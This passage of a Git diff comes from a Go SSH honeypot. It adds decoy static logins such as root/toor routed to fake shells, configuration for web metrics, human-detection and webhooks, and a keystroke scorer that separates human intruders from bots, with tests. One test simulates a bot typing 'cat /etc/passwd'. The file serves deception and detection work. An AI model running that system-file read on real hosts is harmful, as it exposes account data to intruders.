func TestThresholdAcceptance(t *testing.T) {
|
func TestThresholdAcceptance(t *testing.T) {
|
||||||
a := newTestAuth(3, time.Hour)
|
a := newTestAuth(3, time.Hour)
|
||||||
for i := 0; i < 2; i++ {
|
for i := range 2 {
|
||||||
d := a.Authenticate("1.2.3.4", "user", "pass")
|
d := a.Authenticate("1.2.3.4", "user", "pass")
|
||||||
if d.Accepted {
|
if d.Accepted {
|
||||||
t.Fatalf("attempt %d should be rejected", i+1)
|
t.Fatalf("attempt %d should be rejected", i+1)
|
||||||
@@ -65,7 +65,7 @@ func TestPerIPIsolation(t *testing.T) {
|
|||||||
a := newTestAuth(3, time.Hour)
|
a := newTestAuth(3, time.Hour)
|
||||||
|
|
||||||
// IP1 gets 2 failures.
|
// IP1 gets 2 failures.
|
||||||
for i := 0; i < 2; i++ {
|
for range 2 {
|
||||||
a.Authenticate("1.1.1.1", "user", "pass")
|
a.Authenticate("1.1.1.1", "user", "pass")
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -153,16 +153,47 @@ func TestExpiredCredentialsSweep(t *testing.T) {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
func TestStaticCredentialShellPropagation(t *testing.T) {
|
||||||
|
a := newTestAuth(10, time.Hour,
|
||||||
|
config.Credential{Username: "samsung", Password: "fridge", Shell: "fridge"},
|
||||||
|
config.Credential{Username: "root", Password: "toor"},
|
||||||
|
)
|
||||||
|
|
||||||
|
// Static credential with shell set should propagate it.
|
||||||
|
d := a.Authenticate("1.2.3.4", "samsung", "fridge")
|
||||||
|
if !d.Accepted || d.Reason != "static_credential" {
|
||||||
|
t.Fatalf("got %+v, want accepted with static_credential", d)
|
||||||
|
}
|
||||||
|
if d.Shell != "fridge" {
|
||||||
|
t.Errorf("Shell = %q, want %q", d.Shell, "fridge")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Static credential without shell should leave it empty.
|
||||||
|
d = a.Authenticate("1.2.3.4", "root", "toor")
|
||||||
|
if !d.Accepted || d.Reason != "static_credential" {
|
||||||
|
t.Fatalf("got %+v, want accepted with static_credential", d)
|
||||||
|
}
|
||||||
|
if d.Shell != "" {
|
||||||
|
t.Errorf("Shell = %q, want empty", d.Shell)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Threshold-reached decision should not have a shell set.
|
||||||
|
a2 := newTestAuth(2, time.Hour)
|
||||||
|
a2.Authenticate("5.5.5.5", "user", "pass")
|
||||||
|
d = a2.Authenticate("5.5.5.5", "user", "pass")
|
||||||
|
if d.Shell != "" {
|
||||||
|
t.Errorf("threshold decision Shell = %q, want empty", d.Shell)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
func TestConcurrentAccess(t *testing.T) {
|
func TestConcurrentAccess(t *testing.T) {
|
||||||
a := newTestAuth(5, time.Hour)
|
a := newTestAuth(5, time.Hour)
|
||||||
var wg sync.WaitGroup
|
var wg sync.WaitGroup
|
||||||
|
|
||||||
for i := 0; i < 100; i++ {
|
for range 100 {
|
||||||
wg.Add(1)
|
wg.Go(func() {
|
||||||
go func() {
|
|
||||||
defer wg.Done()
|
|
||||||
a.Authenticate("1.2.3.4", "user", "pass")
|
a.Authenticate("1.2.3.4", "user", "pass")
|
||||||
}()
|
})
|
||||||
}
|
}
|
||||||
wg.Wait()
|
wg.Wait()
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -12,10 +12,29 @@ type Config struct {
|
|||||||
SSH SSHConfig `toml:"ssh"`
|
SSH SSHConfig `toml:"ssh"`
|
||||||
Auth AuthConfig `toml:"auth"`
|
Auth AuthConfig `toml:"auth"`
|
||||||
Storage StorageConfig `toml:"storage"`
|
Storage StorageConfig `toml:"storage"`
|
||||||
|
Shell ShellConfig `toml:"shell"`
|
||||||
|
Web WebConfig `toml:"web"`
|
||||||
|
Detection DetectionConfig `toml:"detection"`
|
||||||
|
Notify NotifyConfig `toml:"notify"`
|
||||||
LogLevel string `toml:"log_level"`
|
LogLevel string `toml:"log_level"`
|
||||||
LogFormat string `toml:"log_format"` // "text" (default) or "json"
|
LogFormat string `toml:"log_format"` // "text" (default) or "json"
|
||||||
}
|
}
|
||||||
|
|
||||||
|
type WebConfig struct {
|
||||||
|
Enabled bool `toml:"enabled"`
|
||||||
|
ListenAddr string `toml:"listen_addr"`
|
||||||
|
MetricsEnabled *bool `toml:"metrics_enabled"`
|
||||||
|
MetricsToken string `toml:"metrics_token"`
|
||||||
|
}
|
||||||
|
|
||||||
|
type ShellConfig struct {
|
||||||
|
Hostname string `toml:"hostname"`
|
||||||
|
Banner string `toml:"banner"`
|
||||||
|
FakeUser string `toml:"fake_user"`
|
||||||
|
UsernameRoutes map[string]string `toml:"username_routes"`
|
||||||
|
Shells map[string]map[string]any `toml:"-"` // per-shell config extracted manually
|
||||||
|
}
|
||||||
|
|
||||||
type StorageConfig struct {
|
type StorageConfig struct {
|
||||||
DBPath string `toml:"db_path"`
|
DBPath string `toml:"db_path"`
|
||||||
RetentionDays int `toml:"retention_days"`
|
RetentionDays int `toml:"retention_days"`
|
||||||
@@ -43,6 +62,26 @@ type AuthConfig struct {
|
|||||||
type Credential struct {
|
type Credential struct {
|
||||||
Username string `toml:"username"`
|
Username string `toml:"username"`
|
||||||
Password string `toml:"password"`
|
Password string `toml:"password"`
|
||||||
|
Shell string `toml:"shell"` // optional: route to specific shell (empty = random)
|
||||||
|
}
|
||||||
|
|
||||||
|
type DetectionConfig struct {
|
||||||
|
Enabled bool `toml:"enabled"`
|
||||||
|
Threshold float64 `toml:"threshold"`
|
||||||
|
UpdateInterval string `toml:"update_interval"`
|
||||||
|
|
||||||
|
// Parsed duration, not from TOML directly.
|
||||||
|
UpdateIntervalDuration time.Duration `toml:"-"`
|
||||||
|
}
|
||||||
|
|
||||||
|
type NotifyConfig struct {
|
||||||
|
Webhooks []WebhookNotifyConfig `toml:"webhooks"`
|
||||||
|
}
|
||||||
|
|
||||||
|
type WebhookNotifyConfig struct {
|
||||||
|
URL string `toml:"url"`
|
||||||
|
Headers map[string]string `toml:"headers"`
|
||||||
|
Events []string `toml:"events"` // empty = all events
|
||||||
}
|
}
|
||||||
|
|
||||||
func Load(path string) (*Config, error) {
|
func Load(path string) (*Config, error) {
|
||||||
@@ -56,6 +95,14 @@ func Load(path string) (*Config, error) {
|
|||||||
return nil, fmt.Errorf("parsing config: %w", err)
|
return nil, fmt.Errorf("parsing config: %w", err)
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// Second pass: extract per-shell sub-tables (e.g. [shell.bash]).
|
||||||
|
var raw map[string]any
|
||||||
|
if err := toml.Unmarshal(data, &raw); err == nil {
|
||||||
|
if shellSection, ok := raw["shell"].(map[string]any); ok {
|
||||||
|
cfg.Shell.Shells = extractShellTables(shellSection)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
applyDefaults(cfg)
|
applyDefaults(cfg)
|
||||||
|
|
||||||
if err := validate(cfg); err != nil {
|
if err := validate(cfg); err != nil {
|
||||||
@@ -96,6 +143,50 @@ func applyDefaults(cfg *Config) {
|
|||||||
if cfg.Storage.RetentionInterval == "" {
|
if cfg.Storage.RetentionInterval == "" {
|
||||||
cfg.Storage.RetentionInterval = "1h"
|
cfg.Storage.RetentionInterval = "1h"
|
||||||
}
|
}
|
||||||
|
if cfg.Web.ListenAddr == "" {
|
||||||
|
cfg.Web.ListenAddr = ":8080"
|
||||||
|
}
|
||||||
|
if cfg.Web.MetricsEnabled == nil {
|
||||||
|
t := true
|
||||||
|
cfg.Web.MetricsEnabled = &t
|
||||||
|
}
|
||||||
|
if cfg.Shell.Hostname == "" {
|
||||||
|
cfg.Shell.Hostname = "ubuntu-server"
|
||||||
|
}
|
||||||
|
if cfg.Shell.Banner == "" {
|
||||||
|
cfg.Shell.Banner = "Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-89-generic x86_64)\r\n\r\n"
|
||||||
|
}
|
||||||
|
if cfg.Detection.Threshold == 0 {
|
||||||
|
cfg.Detection.Threshold = 0.6
|
||||||
|
}
|
||||||
|
if cfg.Detection.UpdateInterval == "" {
|
||||||
|
cfg.Detection.UpdateInterval = "5s"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// knownShellKeys are top-level keys in [shell] that are not per-shell sub-tables.
|
||||||
|
var knownShellKeys = map[string]bool{
|
||||||
|
"hostname": true,
|
||||||
|
"banner": true,
|
||||||
|
"fake_user": true,
|
||||||
|
"username_routes": true,
|
||||||
|
}
|
||||||
|
|
||||||
|
// extractShellTables pulls per-shell config sub-tables from the raw [shell] section.
|
||||||
|
func extractShellTables(section map[string]any) map[string]map[string]any {
|
||||||
|
result := make(map[string]map[string]any)
|
||||||
|
for key, val := range section {
|
||||||
|
if knownShellKeys[key] {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
if sub, ok := val.(map[string]any); ok {
|
||||||
|
result[key] = sub
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if len(result) == 0 {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
return result
|
||||||
}
|
}
|
||||||
|
|
||||||
func validate(cfg *Config) error {
|
func validate(cfg *Config) error {
|
||||||
@@ -134,5 +225,33 @@ func validate(cfg *Config) error {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// Validate detection config.
|
||||||
|
if cfg.Detection.Enabled {
|
||||||
|
if cfg.Detection.Threshold < 0 || cfg.Detection.Threshold > 1 {
|
||||||
|
return fmt.Errorf("detection.threshold must be between 0 and 1, got %f", cfg.Detection.Threshold)
|
||||||
|
}
|
||||||
|
ui, err := time.ParseDuration(cfg.Detection.UpdateInterval)
|
||||||
|
if err != nil {
|
||||||
|
return fmt.Errorf("invalid detection.update_interval %q: %w", cfg.Detection.UpdateInterval, err)
|
||||||
|
}
|
||||||
|
if ui <= 0 {
|
||||||
|
return fmt.Errorf("detection.update_interval must be positive, got %s", ui)
|
||||||
|
}
|
||||||
|
cfg.Detection.UpdateIntervalDuration = ui
|
||||||
|
}
|
||||||
|
|
||||||
|
// Validate notify config.
|
||||||
|
knownEvents := map[string]bool{"human_detected": true, "session_started": true}
|
||||||
|
for i, wh := range cfg.Notify.Webhooks {
|
||||||
|
if wh.URL == "" {
|
||||||
|
return fmt.Errorf("notify.webhooks[%d]: url must not be empty", i)
|
||||||
|
}
|
||||||
|
for j, ev := range wh.Events {
|
||||||
|
if !knownEvents[ev] {
|
||||||
|
return fmt.Errorf("notify.webhooks[%d].events[%d]: unknown event %q", i, j, ev)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
return nil
|
return nil
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -169,6 +169,135 @@ retention_interval = "2h"
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
func TestLoadShellDefaults(t *testing.T) {
|
||||||
|
path := writeTemp(t, "")
|
||||||
|
cfg, err := Load(path)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("unexpected error: %v", err)
|
||||||
|
}
|
||||||
|
if cfg.Shell.Hostname != "ubuntu-server" {
|
||||||
|
t.Errorf("default hostname = %q, want %q", cfg.Shell.Hostname, "ubuntu-server")
|
||||||
|
}
|
||||||
|
if cfg.Shell.Banner == "" {
|
||||||
|
t.Error("default banner should not be empty")
|
||||||
|
}
|
||||||
|
if cfg.Shell.FakeUser != "" {
|
||||||
|
t.Errorf("default fake_user = %q, want empty", cfg.Shell.FakeUser)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestLoadShellConfig(t *testing.T) {
|
||||||
|
content := `
|
||||||
|
[shell]
|
||||||
|
hostname = "myhost"
|
||||||
|
banner = "Custom banner\r\n"
|
||||||
|
fake_user = "admin"
|
||||||
|
|
||||||
|
[shell.bash]
|
||||||
|
custom_key = "value"
|
||||||
|
`
|
||||||
|
path := writeTemp(t, content)
|
||||||
|
cfg, err := Load(path)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("unexpected error: %v", err)
|
||||||
|
}
|
||||||
|
if cfg.Shell.Hostname != "myhost" {
|
||||||
|
t.Errorf("hostname = %q, want %q", cfg.Shell.Hostname, "myhost")
|
||||||
|
}
|
||||||
|
if cfg.Shell.Banner != "Custom banner\r\n" {
|
||||||
|
t.Errorf("banner = %q, want %q", cfg.Shell.Banner, "Custom banner\r\n")
|
||||||
|
}
|
||||||
|
if cfg.Shell.FakeUser != "admin" {
|
||||||
|
t.Errorf("fake_user = %q, want %q", cfg.Shell.FakeUser, "admin")
|
||||||
|
}
|
||||||
|
if cfg.Shell.Shells == nil {
|
||||||
|
t.Fatal("Shells map should not be nil")
|
||||||
|
}
|
||||||
|
bashCfg, ok := cfg.Shell.Shells["bash"]
|
||||||
|
if !ok {
|
||||||
|
t.Fatal("Shells[\"bash\"] not found")
|
||||||
|
}
|
||||||
|
if bashCfg["custom_key"] != "value" {
|
||||||
|
t.Errorf("Shells[\"bash\"][\"custom_key\"] = %v, want %q", bashCfg["custom_key"], "value")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestLoadWebDefaults(t *testing.T) {
|
||||||
|
path := writeTemp(t, "")
|
||||||
|
cfg, err := Load(path)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("unexpected error: %v", err)
|
||||||
|
}
|
||||||
|
if cfg.Web.Enabled {
|
||||||
|
t.Error("web should be disabled by default")
|
||||||
|
}
|
||||||
|
if cfg.Web.ListenAddr != ":8080" {
|
||||||
|
t.Errorf("default web listen_addr = %q, want %q", cfg.Web.ListenAddr, ":8080")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestLoadWebConfig(t *testing.T) {
|
||||||
|
content := `
|
||||||
|
[web]
|
||||||
|
enabled = true
|
||||||
|
listen_addr = ":9090"
|
||||||
|
`
|
||||||
|
path := writeTemp(t, content)
|
||||||
|
cfg, err := Load(path)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("unexpected error: %v", err)
|
||||||
|
}
|
||||||
|
if !cfg.Web.Enabled {
|
||||||
|
t.Error("web should be enabled")
|
||||||
|
}
|
||||||
|
if cfg.Web.ListenAddr != ":9090" {
|
||||||
|
t.Errorf("web listen_addr = %q, want %q", cfg.Web.ListenAddr, ":9090")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestLoadCredentialWithShell(t *testing.T) {
|
||||||
|
content := `
|
||||||
|
[[auth.static_credentials]]
|
||||||
|
username = "samsung"
|
||||||
|
password = "fridge"
|
||||||
|
shell = "fridge"
|
||||||
|
|
||||||
|
[[auth.static_credentials]]
|
||||||
|
username = "root"
|
||||||
|
password = "toor"
|
||||||
|
`
|
||||||
|
path := writeTemp(t, content)
|
||||||
|
cfg, err := Load(path)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("unexpected error: %v", err)
|
||||||
|
}
|
||||||
|
if len(cfg.Auth.StaticCredentials) != 2 {
|
||||||
|
t.Fatalf("static_credentials len = %d, want 2", len(cfg.Auth.StaticCredentials))
|
||||||
|
}
|
||||||
|
if cfg.Auth.StaticCredentials[0].Shell != "fridge" {
|
||||||
|
t.Errorf("cred[0].Shell = %q, want %q", cfg.Auth.StaticCredentials[0].Shell, "fridge")
|
||||||
|
}
|
||||||
|
if cfg.Auth.StaticCredentials[1].Shell != "" {
|
||||||
|
t.Errorf("cred[1].Shell = %q, want empty", cfg.Auth.StaticCredentials[1].Shell)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestLoadMetricsToken(t *testing.T) {
|
||||||
|
content := `
|
||||||
|
[web]
|
||||||
|
enabled = true
|
||||||
|
metrics_token = "my-secret-token"
|
||||||
|
`
|
||||||
|
path := writeTemp(t, content)
|
||||||
|
cfg, err := Load(path)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("unexpected error: %v", err)
|
||||||
|
}
|
||||||
|
if cfg.Web.MetricsToken != "my-secret-token" {
|
||||||
|
t.Errorf("metrics_token = %q, want %q", cfg.Web.MetricsToken, "my-secret-token")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
func TestLoadMissingFile(t *testing.T) {
|
func TestLoadMissingFile(t *testing.T) {
|
||||||
_, err := Load("/nonexistent/path/config.toml")
|
_, err := Load("/nonexistent/path/config.toml")
|
||||||
if err == nil {
|
if err == nil {
|
||||||
@@ -184,6 +313,42 @@ func TestLoadInvalidTOML(t *testing.T) {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
func TestLoadUsernameRoutes(t *testing.T) {
|
||||||
|
content := `
|
||||||
|
[shell]
|
||||||
|
hostname = "myhost"
|
||||||
|
|
||||||
|
[shell.username_routes]
|
||||||
|
postgres = "psql"
|
||||||
|
admin = "bash"
|
||||||
|
|
||||||
|
[shell.bash]
|
||||||
|
custom_key = "value"
|
||||||
|
`
|
||||||
|
path := writeTemp(t, content)
|
||||||
|
cfg, err := Load(path)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("unexpected error: %v", err)
|
||||||
|
}
|
||||||
|
if cfg.Shell.UsernameRoutes == nil {
|
||||||
|
t.Fatal("UsernameRoutes should not be nil")
|
||||||
|
}
|
||||||
|
if cfg.Shell.UsernameRoutes["postgres"] != "psql" {
|
||||||
|
t.Errorf("UsernameRoutes[\"postgres\"] = %q, want %q", cfg.Shell.UsernameRoutes["postgres"], "psql")
|
||||||
|
}
|
||||||
|
if cfg.Shell.UsernameRoutes["admin"] != "bash" {
|
||||||
|
t.Errorf("UsernameRoutes[\"admin\"] = %q, want %q", cfg.Shell.UsernameRoutes["admin"], "bash")
|
||||||
|
}
|
||||||
|
// username_routes should NOT appear in the Shells map.
|
||||||
|
if _, ok := cfg.Shell.Shells["username_routes"]; ok {
|
||||||
|
t.Error("username_routes should not appear in Shells map")
|
||||||
|
}
|
||||||
|
// bash should still appear in Shells map.
|
||||||
|
if _, ok := cfg.Shell.Shells["bash"]; !ok {
|
||||||
|
t.Error("Shells[\"bash\"] should still be present")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
func writeTemp(t *testing.T, content string) string {
|
func writeTemp(t *testing.T, content string) string {
|
||||||
t.Helper()
|
t.Helper()
|
||||||
path := filepath.Join(t.TempDir(), "config.toml")
|
path := filepath.Join(t.TempDir(), "config.toml")
|
||||||
|
|||||||
259
internal/detection/scorer.go
Normal file
259
internal/detection/scorer.go
Normal file
@@ -0,0 +1,259 @@
|
|||||||
|
package detection
|
||||||
|
|
||||||
|
import (
|
||||||
|
"math"
|
||||||
|
"sync"
|
||||||
|
"time"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Direction constants for RecordEvent.
|
||||||
|
const (
|
||||||
|
DirInput = 0 // client → server (keystrokes)
|
||||||
|
DirOutput = 1 // server → client (shell output)
|
||||||
|
)
|
||||||
|
|
||||||
|
// Signal weights for the composite score.
|
||||||
|
const (
|
||||||
|
weightTimingVariance = 0.30
|
||||||
|
weightSpecialKeys = 0.20
|
||||||
|
weightTypingSpeed = 0.20
|
||||||
|
weightCommandDiversity = 0.15
|
||||||
|
weightSessionDuration = 0.15
|
||||||
|
)
|
||||||
|
|
||||||
|
// Scorer accumulates keystroke events and computes a 0.0–1.0
|
||||||
|
// human likelihood score based on multiple signals.
|
||||||
|
type Scorer struct {
|
||||||
|
mu sync.Mutex
|
||||||
|
|
||||||
|
// Input timing data.
|
||||||
|
inputTimes []time.Time
|
||||||
|
delays []time.Duration
|
||||||
|
|
||||||
|
// Special key counters.
|
||||||
|
specialKeys int
|
||||||
|
|
||||||
|
// Command tracking: we count newlines and unique command prefixes.
|
||||||
|
currentCmd []byte
|
||||||
|
commands map[string]struct{}
|
||||||
|
|
||||||
|
// Session activity duration.
|
||||||
|
firstInput time.Time
|
||||||
|
lastInput time.Time
|
||||||
|
}
|
||||||
|
|
||||||
|
// NewScorer returns a new Scorer ready to record events.
|
||||||
|
func NewScorer() *Scorer {
|
||||||
|
return &Scorer{
|
||||||
|
commands: make(map[string]struct{}),
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// RecordEvent records a data event with timestamp and direction.
|
||||||
|
// direction should be DirInput (0) for client input or DirOutput (1) for server output.
|
||||||
|
func (s *Scorer) RecordEvent(ts time.Time, direction int, data []byte) {
|
||||||
|
if direction != DirInput {
|
||||||
|
return // only analyze input
|
||||||
|
}
|
||||||
|
|
||||||
|
s.mu.Lock()
|
||||||
|
defer s.mu.Unlock()
|
||||||
|
|
||||||
|
if s.firstInput.IsZero() {
|
||||||
|
s.firstInput = ts
|
||||||
|
}
|
||||||
|
s.lastInput = ts
|
||||||
|
|
||||||
|
for _, b := range data {
|
||||||
|
// Track inter-keystroke delay for single-byte inputs.
|
||||||
|
if len(s.inputTimes) > 0 {
|
||||||
|
delay := ts.Sub(s.inputTimes[len(s.inputTimes)-1])
|
||||||
|
if delay > 0 && delay < 30*time.Second {
|
||||||
|
s.delays = append(s.delays, delay)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
s.inputTimes = append(s.inputTimes, ts)
|
||||||
|
|
||||||
|
// Count special keys.
|
||||||
|
if isSpecialKey(b) {
|
||||||
|
s.specialKeys++
|
||||||
|
}
|
||||||
|
|
||||||
|
// Track commands (split on newline/CR).
|
||||||
|
if b == '\r' || b == '\n' {
|
||||||
|
cmd := string(s.currentCmd)
|
||||||
|
if len(cmd) > 0 {
|
||||||
|
s.commands[cmd] = struct{}{}
|
||||||
|
}
|
||||||
|
s.currentCmd = s.currentCmd[:0]
|
||||||
|
} else {
|
||||||
|
// Handle backspace: remove last byte from current command.
|
||||||
|
if b == 0x7f || b == 0x08 {
|
||||||
|
if len(s.currentCmd) > 0 {
|
||||||
|
s.currentCmd = s.currentCmd[:len(s.currentCmd)-1]
|
||||||
|
}
|
||||||
|
} else if b >= 0x20 { // printable
|
||||||
|
s.currentCmd = append(s.currentCmd, b)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Score computes the composite human likelihood score (0.0–1.0).
|
||||||
|
// Thread-safe.
|
||||||
|
func (s *Scorer) Score() float64 {
|
||||||
|
s.mu.Lock()
|
||||||
|
defer s.mu.Unlock()
|
||||||
|
|
||||||
|
if len(s.inputTimes) == 0 {
|
||||||
|
return 0
|
||||||
|
}
|
||||||
|
|
||||||
|
tv := s.timingVarianceScore()
|
||||||
|
sk := s.specialKeysScore()
|
||||||
|
ts := s.typingSpeedScore()
|
||||||
|
cd := s.commandDiversityScore()
|
||||||
|
sd := s.sessionDurationScore()
|
||||||
|
|
||||||
|
score := tv*weightTimingVariance +
|
||||||
|
sk*weightSpecialKeys +
|
||||||
|
ts*weightTypingSpeed +
|
||||||
|
cd*weightCommandDiversity +
|
||||||
|
sd*weightSessionDuration
|
||||||
|
|
||||||
|
return clamp(score, 0, 1)
|
||||||
|
}
|
||||||
|
|
||||||
|
// timingVarianceScore returns 0–1 based on coefficient of variation of inter-key delays.
|
||||||
|
// Bots have CV ≈ 0 (instant or uniform), humans have CV ≥ 0.6.
|
||||||
|
func (s *Scorer) timingVarianceScore() float64 {
|
||||||
|
if len(s.delays) < 3 {
|
||||||
|
return 0
|
||||||
|
}
|
||||||
|
|
||||||
|
mean := meanDuration(s.delays)
|
||||||
|
if mean == 0 {
|
||||||
|
return 0
|
||||||
|
}
|
||||||
|
|
||||||
|
variance := 0.0
|
||||||
|
for _, d := range s.delays {
|
||||||
|
diff := float64(d) - float64(mean)
|
||||||
|
variance += diff * diff
|
||||||
|
}
|
||||||
|
variance /= float64(len(s.delays))
|
||||||
|
stddev := math.Sqrt(variance)
|
||||||
|
cv := stddev / float64(mean)
|
||||||
|
|
||||||
|
// Map CV to 0–1: CV of 0.6+ is fully human-like.
|
||||||
|
return clamp(cv/0.6, 0, 1)
|
||||||
|
}
|
||||||
|
|
||||||
|
// specialKeysScore returns 0–1 based on count of special key presses.
|
||||||
|
// Scripts almost never generate backspace/tab/ctrl characters.
|
||||||
|
func (s *Scorer) specialKeysScore() float64 {
|
||||||
|
// 5+ special keys → full score.
|
||||||
|
return clamp(float64(s.specialKeys)/5.0, 0, 1)
|
||||||
|
}
|
||||||
|
|
||||||
|
// typingSpeedScore returns 0–1 based on median inter-key delay.
|
||||||
|
// Paste/scripts have < 5ms, humans have 30–300ms.
|
||||||
|
func (s *Scorer) typingSpeedScore() float64 {
|
||||||
|
if len(s.delays) < 2 {
|
||||||
|
return 0
|
||||||
|
}
|
||||||
|
|
||||||
|
med := medianDuration(s.delays)
|
||||||
|
ms := float64(med) / float64(time.Millisecond)
|
||||||
|
|
||||||
|
if ms < 5 {
|
||||||
|
return 0 // paste or script
|
||||||
|
}
|
||||||
|
if ms > 300 {
|
||||||
|
return 0.7 // very slow, still possibly human
|
||||||
|
}
|
||||||
|
if ms >= 30 && ms <= 300 {
|
||||||
|
return 1.0 // human range
|
||||||
|
}
|
||||||
|
// 5–30ms: transition zone
|
||||||
|
return clamp((ms-5)/25, 0, 1)
|
||||||
|
}
|
||||||
|
|
||||||
|
// commandDiversityScore returns 0–1 based on number of unique commands.
|
||||||
|
func (s *Scorer) commandDiversityScore() float64 {
|
||||||
|
// 3+ unique commands → full score.
|
||||||
|
return clamp(float64(len(s.commands))/3.0, 0, 1)
|
||||||
|
}
|
||||||
|
|
||||||
|
// sessionDurationScore returns 0–1 based on active input duration.
|
||||||
|
func (s *Scorer) sessionDurationScore() float64 {
|
||||||
|
if s.firstInput.IsZero() || s.lastInput.IsZero() {
|
||||||
|
return 0
|
||||||
|
}
|
||||||
|
dur := s.lastInput.Sub(s.firstInput)
|
||||||
|
// 10s+ of active input → full score.
|
||||||
|
return clamp(float64(dur)/float64(10*time.Second), 0, 1)
|
||||||
|
}
|
||||||
|
|
||||||
|
// isSpecialKey returns true for non-printable keys that humans commonly use.
|
||||||
|
func isSpecialKey(b byte) bool {
|
||||||
|
switch b {
|
||||||
|
case 0x7f, // DEL (backspace in most terminals)
|
||||||
|
0x08, // BS
|
||||||
|
0x09, // TAB
|
||||||
|
0x03, // Ctrl-C
|
||||||
|
0x04, // Ctrl-D
|
||||||
|
0x1b: // ESC (arrow keys start with ESC)
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
|
||||||
|
func clamp(v, lo, hi float64) float64 {
|
||||||
|
if v < lo {
|
||||||
|
return lo
|
||||||
|
}
|
||||||
|
if v > hi {
|
||||||
|
return hi
|
||||||
|
}
|
||||||
|
return v
|
||||||
|
}
|
||||||
|
|
||||||
|
func meanDuration(ds []time.Duration) time.Duration {
|
||||||
|
if len(ds) == 0 {
|
||||||
|
return 0
|
||||||
|
}
|
||||||
|
var sum time.Duration
|
||||||
|
for _, d := range ds {
|
||||||
|
sum += d
|
||||||
|
}
|
||||||
|
return sum / time.Duration(len(ds))
|
||||||
|
}
|
||||||
|
|
||||||
|
func medianDuration(ds []time.Duration) time.Duration {
|
||||||
|
n := len(ds)
|
||||||
|
if n == 0 {
|
||||||
|
return 0
|
||||||
|
}
|
||||||
|
// Copy to avoid mutating the original.
|
||||||
|
sorted := make([]time.Duration, n)
|
||||||
|
copy(sorted, ds)
|
||||||
|
sortDurations(sorted)
|
||||||
|
if n%2 == 0 {
|
||||||
|
return (sorted[n/2-1] + sorted[n/2]) / 2
|
||||||
|
}
|
||||||
|
return sorted[n/2]
|
||||||
|
}
|
||||||
|
|
||||||
|
func sortDurations(ds []time.Duration) {
|
||||||
|
// Simple insertion sort — delay slices are small.
|
||||||
|
for i := 1; i < len(ds); i++ {
|
||||||
|
key := ds[i]
|
||||||
|
j := i - 1
|
||||||
|
for j >= 0 && ds[j] > key {
|
||||||
|
ds[j+1] = ds[j]
|
||||||
|
j--
|
||||||
|
}
|
||||||
|
ds[j+1] = key
|
||||||
|
}
|
||||||
|
}
|
||||||
151
internal/detection/scorer_test.go
Normal file
151
internal/detection/scorer_test.go
Normal file
@@ -0,0 +1,151 @@
|
|||||||
|
package detection
|
||||||
|
|
||||||
|
import (
|
||||||
|
"sync"
|
||||||
|
"testing"
|
||||||
|
"time"
|
||||||
|
)
|
||||||
|
|
||||||
|
func TestScorer_EmptyInput(t *testing.T) {
|
||||||
|
s := NewScorer()
|
||||||
|
score := s.Score()
|
||||||
|
if score != 0 {
|
||||||
|
t.Errorf("empty scorer: got %f, want 0", score)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestScorer_SingleKeystroke(t *testing.T) {
|
||||||
|
s := NewScorer()
|
||||||
|
s.RecordEvent(time.Now(), DirInput, []byte("a"))
|
||||||
|
score := s.Score()
|
||||||
|
if score != 0 {
|
||||||
|
t.Errorf("single keystroke: got %f, want 0", score)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestScorer_BotLikeInput(t *testing.T) {
|
||||||
|
// Simulate a bot: paste entire commands with uniform tiny delays, no special keys.
|
||||||
|
s := NewScorer()
|
||||||
|
now := time.Now()
|
||||||
|
|
||||||
|
// Bot pastes "cat /etc/passwd\r" all at once with perfectly uniform timing.
|
||||||
|
for range 3 {
|
||||||
|
cmd := []byte("cat /etc/passwd\r")
|
||||||
|
for _, b := range cmd {
|
||||||
|
s.RecordEvent(now, DirInput, []byte{b})
|
||||||
|
now = now.Add(100 * time.Microsecond) // ~0.1ms uniform delay = paste
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
score := s.Score()
|
||||||
|
if score >= 0.3 {
|
||||||
|
t.Errorf("bot-like input: got %f, want < 0.3", score)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
